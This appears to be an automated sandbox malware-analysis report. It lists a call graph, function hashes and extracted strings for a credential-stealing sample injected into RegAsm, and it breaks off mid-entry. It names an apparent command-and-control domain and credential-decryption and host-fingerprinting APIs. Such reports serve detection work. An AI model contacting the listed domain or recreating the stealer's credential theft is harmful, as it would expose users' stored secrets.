11698->11701 11701->11699 11702 41c80e 11706 41dcb0 11702->11706 11718 421b30 11702->11718 11703 41c82c 11707 41dcc6 11706->11707 11715 41dd90 11706->11715 11708 43d4f0 LdrInitializeThunk 11707->11708 11707->11715 11709 41de6d 11708->11709 11712 41deaa 11709->11712 11722 436a90 11709->11722 11714 43d9d0 LdrInitializeThunk 11712->11714 11712->11715 11717 41decc 11714->11717 11715->11703 11717->11715 11717->11717 11725 43aac0 LdrInitializeThunk 11717->11725 11720 421b49 11718->11720 11721 421ca8 11718->11721 11719 41bfe0 LdrInitializeThunk 11719->11721 11720->11719 11720->11720 11721->11703 11723 43d4f0 LdrInitializeThunk 11722->11723 11724 436abd 11723->11724 11725->11715 11483 41c051 11484 41c078 11483->11484 11487 41c100 11484->11487 11490 43d4f0 11487->11490 11489 41c159 11492 43d510 11490->11492 11491 43d68e 11491->11489 11492->11491 11494 43aac0 LdrInitializeThunk 11492->11494 11494->11491 11495 4212d0 11500 420ac0 11495->11500 11497 42138f 11514 43aac0 LdrInitializeThunk 11497->11514 11500->11495 11500->11497 11500->11500 11502 43dda0 11500->11502 11506 43e510 11500->11506 11501 42139e 11503 43ddc0 11502->11503 11505 43dece 11503->11505 11515 43aac0 LdrInitializeThunk 11503->11515 11505->11500 11508 43e540 11506->11508 11507 43e5be 11513 43e6ae 11507->11513 11517 438800 11507->11517 11508->11507 11516 43aac0 LdrInitializeThunk 11508->11516 11511 43e601 11511->11513 11520 43aac0 LdrInitializeThunk 11511->11520 11513->11500 11514->11501 11515->11505 11516->11507 11518 438838 11517->11518 11519 43888f RtlAllocateHeap 11517->11519 11518->11519 11519->11511 11520->11513 11726 417592 11730 417591 11726->11730 11727 43d8c0 LdrInitializeThunk 11727->11730 11728 4178ca 11730->11726 11730->11727 11730->11728 11731 43d9d0 LdrInitializeThunk 11730->11731 11732 4178a3 CryptUnprotectData 11730->11732 11733 401eb0 11730->11733 11731->11730 11732->11728 11732->11730 11734 401eb8 11733->11734 11735 401edc 11733->11735 11738 401ee0 11734->11738 11735->11730 11737 401edb 11737->11730 11739 401ef5 11738->11739 11745 401f3d 11738->11745 11740 4020a7 11739->11740 11742 4021cf 11739->11742 11743 4020f5 11739->11743 11739->11745 11759 402fa0 11740->11759 11744 402309 11742->11744 11742->11745 11757 40224f 11742->11757 11743->11744 11743->11745 11752 402152 11743->11752 11746 402a20 RtlFreeHeap 11744->11746 11745->11737 11746->11745 11747 402fa0 2 API calls 11747->11757 11748 401ee0 2 API calls 11748->11752 11749 40228c 11749->11745 11750 402a20 RtlFreeHeap 11749->11750 11750->11745 11751 402a20 RtlFreeHeap 11751->11749 11752->11745 11752->11748 11752->11749 11758 4025c9 11752->11758 11753 401ee0 2 API calls 11753->11757 11755 4025a3 11756 402a20 RtlFreeHeap 11755->11756 11756->11749 11757->11745 11757->11747 11757->11749 11757->11753 11757->11755 11757->11758 11767 402b50 11757->11767 11758->11751 11760 402fb4 11759->11760 11762 403219 11759->11762 11760->11762 11764 438800 RtlAllocateHeap 11760->11764 11761 4031f4 11761->11762 11771 4389c2 RtlFreeHeap 11761->11771 11762->11745 11763 402fff 11763->11762 11765 438800 RtlAllocateHeap 11763->11765 11764->11763 11765->11761 11769 402b64 11767->11769 11770 402beb 11767->11770 11769->11770 11772 402d60 11769->11772 11770->11757 11773 402d89 11772->11773 11777 438800 RtlAllocateHeap 11773->11777 11774 402dbd 11775 402b50 RtlAllocateHeap 11774->11775 11776 402e6a 11774->11776 11775->11774 11776->11770 11777->11774 11778 41d495 11779 438800 RtlAllocateHeap 11778->11779 11780 41d4a1 11779->11780 11521 421f5a 11522 4220b9 11521->11522 11523 43dda0 LdrInitializeThunk 11522->11523 11524 422110 11523->11524 11528 422138 11524->11528 11547 43e1e0 11524->11547 11525 43dda0 LdrInitializeThunk 11525->11528 11528->11525 11530 43aac0 LdrInitializeThunk 11528->11530 11531 43df00 11528->11531 11539 43e850 11528->11539 11530->11528 11532 43df30 11531->11532 11532->11532 11533 43dfae 11532->11533 11555 43aac0 LdrInitializeThunk 11532->11555 11534 438800 RtlAllocateHeap 11533->11534 11538 43e09e 11533->11538 11536 43dff1 11534->11536 11536->11538 11556 43aac0 LdrInitializeThunk 11536->11556 11538->11528 11540 43e870 11539->11540 11540->11540 11541 43e96e 11540->11541 11557 43aac0 LdrInitializeThunk 11540->11557 11542 438800 RtlAllocateHeap 11541->11542 11546 43ea72 11541->11546 11544 43e9b3 11542->11544 11544->11546 11558 43aac0 LdrInitializeThunk 11544->11558 11546->11528 11549 43e210 11547->11549 11548 43e28e 11550 438800 RtlAllocateHeap 11548->11550 11553 43e382 11548->11553 11549->11548 11559 43aac0 LdrInitializeThunk 11549->11559 11552 43e2cc 11550->11552 11552->11553 11560 43aac0 LdrInitializeThunk 11552->11560 11553->11528 11555->11533 11556->11538 11557->11541 11558->11546 11559->11548 11560->11553 11561 416c5d 11564 416c57 11561->11564 11563 417043 11566 416df5 11563->11566 11573 43aac0 LdrInitializeThunk 11563->11573 11564->11561 11564->11563 11564->11566 11567 43d9d0 11564->11567 11568 43da00 11567->11568 11571 43da7e 11568->11571 11574 43aac0 LdrInitializeThunk 11568->11574 11569 43db6e 11569->11564 11571->11569 11575 43aac0 LdrInitializeThunk 11571->11575 11573->11566 11574->11571 11575->11569 11576 411add 11581 430f10 11576->11581 11578 411ae3 11579 430f10 6 API calls 11578->11579 11580 411aec 11579->11580 11582 430f46 KiUserCallbackDispatcher GetSystemMetrics 11581->11582 11583 430f8f DeleteObject 11582->11583 11585 430fee SelectObject 11583->11585 11587 43108a SelectObject 11585->11587 11588 4310b3 DeleteObject 11587->11588 11788 42949e 11790 4294f0 11788->11790 11789 42962e 11790->11789 11792 43aac0 LdrInitializeThunk 11790->11792 11792->11789 11793 43a71c 11794 43a7b9 LoadLibraryExW 11793->11794 11796 43a764 11793->11796 11795 43a7c7 11794->11795 11796->11794 11796->11796 11590 43b1e7 11591 43b218 11590->11591 11592 43b28e 11591->11592 11596 43aac0 LdrInitializeThunk 11591->11596 11595 43aac0 LdrInitializeThunk 11592->11595 11595->11592 11596->11592 11597 428f65 11598 428f6c 11597->11598 11599 429092 GetPhysicallyInstalledSystemMemory 11598->11599 11600 4290b9 11599->11600 11600->11600 11601 417369 11606 43d8c0 11601->11606 11603 417379 11604 43d9d0 LdrInitializeThunk 11603->11604 11605 4173a4 11603->11605 11604->11605 11607 43d8f2 11606->11607 11608 43d97e 11607->11608 11610 43aac0 LdrInitializeThunk 11607->11610 11608->11603 11610->11608 11611 41fcea 11612 43dda0 LdrInitializeThunk 11611->11612 11613 41fd04 11612->11613 11800 4180aa 11801 4180a3 11800->11801 11801->11800 11801->11801 11802 43d4f0 LdrInitializeThunk 11801->11802 11803 41829a 11801->11803 11802->11801 11804 4183e3 11803->11804 11806 43aac0 LdrInitializeThunk 11803->11806 11806->11803 11807 43b8af 11809 43b7ca 11807->11809 11808 43b949 11809->11807 11809->11808 11811 43aac0 LdrInitializeThunk 11809->11811 11811->11809 11812 41842c 11814 41845d 11812->11814 11813 436a90 LdrInitializeThunk 11813->11814 11814->11813 11815 418dcc 11814->11815 11816 418dbd 11814->11816 11816->11815 11816->11816 11817 41bfe0 LdrInitializeThunk 11816->11817 11818 419370 11817->11818 11614 43686c 11617 43ca00 11614->11617 11618 436894 GetVolumeInformationW 11617->11618 11819 409530 11822 409539 11819->11822 11820 40954a 11821 40958d ExitProcess 11820->11821 11822->11820 11823 409555 11822->11823 11831 40a580 11822->11831 11824 409560 11823->11824 11838 43a840 11824->11838 11827 40958b 11827->11821 11828 40955c 11828->11824 11829 40957f 11828->11829 11837 40c440 FreeLibrary 11829->11837 11832 40a6d7 LoadLibraryExW 11831->11832 11833 40a67f 11831->11833 11835 40a714 11832->11835 11833->11832 11834 40a9fd GetProcessVersion 11836 40a71b 11834->11836 11835->11834 11835->11836 11836->11828 11837->11824 11841 43c3b0 11838->11841 11840 43a845 FreeLibrary 11840->11827 11842 43c3b9 11841->11842 11842->11840 11843 4188b1 11848 4193b0 11843->11848 11845 4188c3 11846 4193b0 LdrInitializeThunk 11845->11846 11847 4188db 11846->11847 11849 419455 11848->11849 11850 41bfe0 LdrInitializeThunk 11849->11850 11851 419869 11850->11851 11852 41e0b0 11853 41e10f 11852->11853 11854 41e0bc 11852->11854 11855 41bfe0 LdrInitializeThunk 11854->11855 11855->11853 11624 42d670 11626 42d675 11624->11626 11625 42d745 SysAllocString 11626->11625 11626->11626 11856 413bb2 11857 413bbf 11856->11857 11860 417160 11857->11860 11859 413bd2 11861 417180 11860->11861 11862 43d4f0 LdrInitializeThunk 11861->11862 11863 41735a 11862->11863 11627 43aa76 RtlReAllocateHeap 11628 4133f4 11631 41bfe0 11628->11631 11632 41c100 LdrInitializeThunk 11631->11632 11633 41c02e 11632->11633 11639 4103f7 GetSystemDirectoryW 11640 410421 11639->11640 11864 41233a 11865 412343 11864->11865 11866 4199d0 LdrInitializeThunk 11865->11866 11867 412353 11866->11867 11868 4199d0 LdrInitializeThunk 11867->11868 11869 412379 11868->11869

        Executed Functions

        Function 00430F10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174COMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
        • String ID: $\D
        • API String ID: 1449868515-2336249234
        • Opcode ID: b2f1c2b85b67d381075e055d1e0933cb9c3f677de63a2a07af62926eb1445558
        • Instruction ID: b39d5cbee03da8dfb07941cdd59d89a9ce7e80d2681e5ab4337a2764b7f1900d
        • Opcode Fuzzy Hash: b2f1c2b85b67d381075e055d1e0933cb9c3f677de63a2a07af62926eb1445558
        • Instruction Fuzzy Hash: 48A14FB45193848FE360EF24D54879FBBF0BB86348F51892EE4899B350DBB99448CB47
        Function 0040FF30 Relevance: 11.5, Strings: 9, Instructions: 270COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 327 40ff30-40ff75 328 40ffd6-41005b 327->328 329 40ff77 327->329 331 4100b5-4100c6 328->331 332 41005d-41005f 328->332 330 40ff80-40ffd4 329->330 330->328 330->330 334 4100c8-4100cf 331->334 335 4100db-4100e3 331->335 333 410060-4100b3 332->333 333->331 333->333 336 4100d0-4100d9 334->336 337 4100e5-4100e6 335->337 338 4100fb-410108 335->338 336->335 336->336 339 4100f0-4100f9 337->339 340 41012b-410133 338->340 341 41010a-410111 338->341 339->338 339->339 343 410135-410136 340->343 344 41014b-41028a 340->344 342 410120-410129 341->342 342->340 342->342 345 410140-410149 343->345 346 4102e0-41032d 344->346 347 41028c-41028f 344->347 345->344 345->345 349 41032f 346->349 350 41038e-4103b5 call 40c450 346->350 348 410290-4102de 347->348 348->346 348->348 351 410330-41038c 349->351 353 4103ba-4103d4 350->353 351->350 351->351
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $68$)(8p$)(8p$1$%8$9/cS$:-*+$<*-8$?>~)$potterryisiw.shop
        • API String ID: 0-1479513362
        • Opcode ID: 8d0051421ae3087eeb1e994f1559e5d92f53fbc8246a7fe36ee3717cc4b690b8
        • Instruction ID: a16be8e964f36d79c9f861597187d9fd2e43ad97ed143db0b067413bddb66209
        • Opcode Fuzzy Hash: 8d0051421ae3087eeb1e994f1559e5d92f53fbc8246a7fe36ee3717cc4b690b8
        • Instruction Fuzzy Hash: 7FB188B05083C08BD332CF25C4947DBBBE5AFD6704F584A4DD4C85B252C7795A89CBAA
        Function 00428A88 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 468COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 689 428a88-428ad6 690 428b24-428b2d 689->690 691 428ad8 689->691 693 428b4b-428fc6 690->693 694 428b2f-428b35 690->694 692 428ae0-428b22 691->692 692->690 692->692 697 429014-42901d 693->697 698 428fc8 693->698 696 428b40-428b49 694->696 696->693 696->696 700 42903b-429045 call 436750 697->700 701 42901f-429025 697->701 699 428fd0-429012 698->699 699->697 699->699 704 42904a-429056 700->704 702 429030-429039 701->702 702->700 702->702 705 42906b-42908d call 43ca00 704->705 706 429058-42905f 704->706 709 429092-4290b7 GetPhysicallyInstalledSystemMemory 705->709 707 429060-429069 706->707 707->705 707->707 710 4290b9-4290c2 709->710 711 42910e-42911b 709->711 713 4290c4 710->713 714 42911d-429122 710->714 712 429133-42916e 711->712 718 429170-4291b6 712->718 719 4291b8-4291f4 712->719 715 4290d0-4290fa 713->715 716 429101-42910c 714->716 717 429124-429130 714->717 715->715 720 4290fc-4290ff 715->720 716->712 717->712 718->718 718->719 721 4291f6 719->721 722 42923f-429248 719->722 720->716 720->717 723 429200-42923d 721->723 724 42924a-429252 722->724 725 42926d 722->725 723->722 723->723 727 429260-429269 724->727 726 42926f-429279 725->726 728 42928b-429299 726->728 729 42927b-42927f 726->729 727->727 730 42926b 727->730 732 4292bb-429312 728->732 733 42929b-4292a1 728->733 731 429280-429289 729->731 730->726 731->728 731->731 735 429360-429369 732->735 736 429314 732->736 734 4292b0-4292b9 733->734 734->732 734->734 738 42938b-429397 735->738 739 42936b-429371 735->739 737 429320-42935e 736->737 737->735 737->737 741 4293ab-42943b 738->741 742 429399-42939f 738->742 740 429380-429389 739->740 740->738 740->740 743 4293a0-4293a9 742->743 743->741 743->743
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 2PBd$AJ|2
        • API String ID: 0-3533766608
        • Opcode ID: 369799990b9b17540f153d9db1cf456ce7f0a3d1c294660dc8c6111f9fa62616
        • Instruction ID: 9b81f59fa9fec819b079e7b5913faa27c40ffdab1ebfad8fc98c52ced06b53f7
        • Opcode Fuzzy Hash: 369799990b9b17540f153d9db1cf456ce7f0a3d1c294660dc8c6111f9fa62616
        • Instruction Fuzzy Hash: 88F17D70204B928BD365CF39C1947A3BBE1BF56304F94496ED4EB8B682D739B805CB54
        Function 00428F65 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 396COMMON
        Download Yara Rule
        APIs
        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042909C
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InstalledMemoryPhysicallySystem
        • String ID: 2PBd$AJ|2
        • API String ID: 3960555810-3533766608
        • Opcode ID: a86de24d1fe8a22a5e152d4d1217ba225a352e4d395d0b13c18828c492104dac
        • Instruction ID: a3eb8938b1a25089ba207bdac1137d9776a66457ef97c196e7f02efb96e43ae3
        • Opcode Fuzzy Hash: a86de24d1fe8a22a5e152d4d1217ba225a352e4d395d0b13c18828c492104dac
        • Instruction Fuzzy Hash: 80D18C70204B528BD765CF39C1947A3FBE1BF56308F94496ED4EB8BA82C739A805CB54
        Function 00417592 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 261COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 6$yA
        • API String ID: 0-400021518
        • Opcode ID: dd5f72c7efeab64b3ea6f7782656cdd851f9face38727ff7eced69619e18c51e
        • Instruction ID: 0b1751d15af5afb3e28d85c507663cc984a9e5c4479d1d373b9566665f947d66
        • Opcode Fuzzy Hash: dd5f72c7efeab64b3ea6f7782656cdd851f9face38727ff7eced69619e18c51e
        • Instruction Fuzzy Hash: 8D91CDB59083819FD714CF28D48166BBBE1AFC5304F14892EF4A987392E778E845CB86
        Function 00424F10 Relevance: 4.3, Strings: 3, Instructions: 596COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ,SB$2],_$iQPS
        • API String ID: 0-3375296685
        • Opcode ID: ca4f66a42113d4dd2ab0eb0a557acd9b6e144656a241f450f2f22fbd72e9482f
        • Instruction ID: d492b950c31d36bc158322ba794af411e8250915dafc2f7219c692af102e55f2
        • Opcode Fuzzy Hash: ca4f66a42113d4dd2ab0eb0a557acd9b6e144656a241f450f2f22fbd72e9482f
        • Instruction Fuzzy Hash: 0422A9716083618FC728CF14D8517ABB7E2FFC6308F444A2DE9999B381E7789945CB86
        Function 0043AAC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12libraryCOMMON
        Download Yara Rule
        APIs
        • LdrInitializeThunk.NTDLL(0043D6BC,005C003F,00000006,?,?,00000018,/.! ,?,ZsA), ref: 0043AAE6
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: /.!
        • API String ID: 2994545307-1547124405
        • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
        • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
        • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
        • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
        Function 00425350 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ,SB
        • API String ID: 0-3344058557
        • Opcode ID: d441079890dc1384fe02bfcbb57e10470465db8928aa69676c90a3fc055d3055
        • Instruction ID: 039eb5016f7fd78d533bc0fda36f1db4599208a88b8e264e670cb45d6bd72028
        • Opcode Fuzzy Hash: d441079890dc1384fe02bfcbb57e10470465db8928aa69676c90a3fc055d3055
        • Instruction Fuzzy Hash: B8B10F716183218BC724CF18D8517ABB3F1FFD6314F448A2DE8959B390E7799941CB86
        Function 0041B990 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: HI
        • API String ID: 0-1987653318
        • Opcode ID: f7d7c7d0fe7cabde2995abf24001a65ad4c96508387fd75d75e371acc18e7a64
        • Instruction ID: f857ae79a21a44feeb6a15e9cef4c0f10714ff32f2e4065077ea1289013618f4
        • Opcode Fuzzy Hash: f7d7c7d0fe7cabde2995abf24001a65ad4c96508387fd75d75e371acc18e7a64
        • Instruction Fuzzy Hash: 854112755083118BC714CF18D8917ABB7F0EFC63A8F048A2DE8959B391E7389A45C7DA
        Function 0041FAE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: je
        • API String ID: 0-3809674245
        • Opcode ID: 60b3f2acf2aec0acf9ebe96d09579e24ec3422f859f4800561d3aef034be247a
        • Instruction ID: 1c38fa654bc97001b06b9bb9048520a71f54be7c7481a91467ad0ed4b5e6a9de
        • Opcode Fuzzy Hash: 60b3f2acf2aec0acf9ebe96d09579e24ec3422f859f4800561d3aef034be247a
        • Instruction Fuzzy Hash: 3631CBB6A087419FD720DF18EC45BCAB3A5FB86349F00893DE49DC6242E73495168B8B
        Function 004180AA Relevance: .2, Instructions: 213COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c79a9aacfbe5e2f32c180dfdafc4f992fa23edefc5b1012d8cd9b8fb0a3f8593
        • Instruction ID: 6402e0bb3909fe31628bd0f5915123d94248cd459176ab4f2c7de53b55bc4d4e
        • Opcode Fuzzy Hash: c79a9aacfbe5e2f32c180dfdafc4f992fa23edefc5b1012d8cd9b8fb0a3f8593
        • Instruction Fuzzy Hash: 15718AB56083118BD728CF14D5A076BB7E2FFC9B14F044A1DE8866B381C7389D46CB9A
        Function 004212D0 Relevance: .2, Instructions: 212COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f0472e055f3a4dff2055362c3bcedd2f213813839f96d446d9e6375fa51102b4
        • Instruction ID: bf0d0334412388f94e8498152736f63782817262afcc8546e4d5242f57d6667f
        • Opcode Fuzzy Hash: f0472e055f3a4dff2055362c3bcedd2f213813839f96d446d9e6375fa51102b4
        • Instruction Fuzzy Hash: 278167B56083818BD728DF11D4A4BABB7E2FFC5304F58896DE48A47251DB349941CB4A
        Function 00402D60 Relevance: .2, Instructions: 182COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b8863c89b4a71dfb8782b38dca209a4b28dd68051076688180005815d0d7225e
        • Instruction ID: f5e873939d1550dce44615af20c07b6bf3e8be0c5ac98c4d3a91bc660a2ff0f2
        • Opcode Fuzzy Hash: b8863c89b4a71dfb8782b38dca209a4b28dd68051076688180005815d0d7225e
        • Instruction Fuzzy Hash: 3B51A2B05042029FD7049F28ED4971BBBA0FF45318F044939F45AA22E1D7B9E968DB8A
        Function 0043B00A Relevance: .1, Instructions: 87COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 06262e27936995fc80322a3ed165d15c5e5b3e9162d3737f6739749793127dea
        • Instruction ID: a2ba0411b3cee10f4caaeae70949e410124a68cbc5d3df4400edfa96d4397e02
        • Opcode Fuzzy Hash: 06262e27936995fc80322a3ed165d15c5e5b3e9162d3737f6739749793127dea
        • Instruction Fuzzy Hash: FB217F742083058FD308CF15C890B2BB7E1EBC9308F64992DE5A5A77D1D339D80ADB9A
        Function 0042F339 Relevance: .0, Instructions: 22COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5850b7b81a79914e313bc8c4bbea3dcb4f8226820c51b19553123e3cc9bfb04d
        • Instruction ID: 985886068b2e716356abbb17699c63c446eb292950ac11608e3e0ec2d72a3155
        • Opcode Fuzzy Hash: 5850b7b81a79914e313bc8c4bbea3dcb4f8226820c51b19553123e3cc9bfb04d
        • Instruction Fuzzy Hash: C0F058B55183408FD310DF28C45434BBBF0BF85308F01882DE98847390CB75A988CBCA
        Function 0040A580 Relevance: 102.2, APIs: 2, Strings: 56, Instructions: 678libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 40a580-40a67d 1 40a6d7-40a719 LoadLibraryExW call 439ce0 0->1 2 40a67f 0->2 7 40a71b-40a72a 1->7 8 40a72f-40a887 call 43ca00 * 12 1->8 3 40a681-40a6d3 2->3 3->3 5 40a6d5 3->5 5->1 11 40b283-40b293 7->11 35 40a88e-40a8a2 8->35 37 40a8b3-40a8f3 call 436d60 35->37 38 40a8a4-40a8ae 35->38 44 40a8f5-40a8ff 37->44 41 40a9f0-40a9f5 38->41 41->11 43 40a9fb-40ad58 GetProcessVersion 41->43 50 40ada8-40adc9 call 40bba0 43->50 51 40ad5a 43->51 44->44 46 40a901-40a91b 44->46 48 40a91d 46->48 49 40a91f-40a923 46->49 52 40a972-40a981 call 40b2a0 48->52 53 40a925-40a928 49->53 67 40add0-40af2c call 408ec0 50->67 68 40adcb 50->68 57 40ad5c-40ada4 51->57 61 40a986-40a988 52->61 54 40a92a-40a92c 53->54 55 40a92e-40a96e call 40fd90 53->55 59 40a970 54->59 55->53 55->59 57->57 62 40ada6 57->62 59->52 65 40a98a-40a9bc 61->65 66 40a98c-40a9b2 call 40bb60 61->66 62->50 75 40a9be-40a9c7 65->75 66->75 83 40af84-40afab call 40c3f0 67->83 84 40af2e 67->84 69 40b272-40b281 68->69 69->11 80 40a9d1-40a9da 75->80 81 40a9c9 75->81 85 40a9dc-40a9e9 80->85 86 40a9ee 80->86 81->80 92 40afb2-40b011 83->92 93 40afad 83->93 87 40af30-40af80 84->87 85->35 86->41 87->87 90 40af82 87->90 90->83 95 40b013 92->95 96 40b069-40b08f call 40c3f0 92->96 94 40b239-40b24a call 4388b0 93->94 104 40b25b-40b263 94->104 105 40b24c-40b259 94->105 99 40b015-40b065 95->99 96->94 103 40b095-40b0c3 call 408f70 96->103 99->99 102 40b067 99->102 102->96 110 40b0cb-40b0dd 103->110 107 40b265-40b26e 104->107 105->107 107->11 111 40b270 107->111 112 40b0ed-40b109 110->112 113 40b0df-40b17c 110->113 111->69 117 40b133 112->117 118 40b10b-40b113 112->118 123 40b17e-40b188 113->123 121 40b137-40b14f 117->121 118->117 120 40b115-40b131 118->120 120->121 121->110 123->123 124 40b18a-40b1a4 123->124 125 40b1a6 124->125 126 40b1a8-40b1ac 124->126 127 40b1fb-40b211 call 40b2a0 125->127 128 40b1ae-40b1b1 126->128 136 40b213 127->136 137 40b215-40b230 call 40bb60 127->137 129 40b1b3-40b1b5 128->129 130 40b1b7-40b1f7 call 40fd90 128->130 132 40b1f9 129->132 130->128 130->132 132->127 138 40b235-40b237 136->138 137->138 138->94
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoadProcessVersion
        • String ID: $!$!$"$#$%$'$'$'$'$)$+$,$-$-$-$/$/$/$0$1$2$3$5$5$6$7$9$:$;$=$=$?$?$?$A$B$C$E$G$I$K$M$O$T$W$Y$[$h$potterryisiw.shop$r$t$u$v$w$~
        • API String ID: 1829952579-2053576172
        • Opcode ID: 10e56e6316571805e3b496b34a46402a8848bc47858688e3e610be39b175c614
        • Instruction ID: 83e59cc675480a0f537e16db5dfb479b10fa2c63f7bafa7316ef033462da114d
        • Opcode Fuzzy Hash: 10e56e6316571805e3b496b34a46402a8848bc47858688e3e610be39b175c614
        • Instruction Fuzzy Hash: 2172F67010C7C1CAD331DB28844879BBFE0AB96324F044A6EE4E99B3D2D7798546DB5B
        Function 00428343 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
